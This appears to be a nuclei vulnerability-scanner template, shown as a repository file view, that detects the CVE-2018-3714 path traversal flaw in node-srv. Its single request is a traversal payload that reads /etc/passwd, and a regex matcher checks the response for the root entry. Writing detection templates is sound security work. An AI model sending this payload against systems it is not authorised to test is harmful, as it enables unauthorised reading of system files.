nuclei-templates/cves/2018/CVE-2018-3714.yaml

20 lines
368 B
YAML
Raw Normal View History

2021-01-02 05:00:39 +00:00
id: CVE-2018-3714
info:
name: node-srv Path Traversal
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/node_modules/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body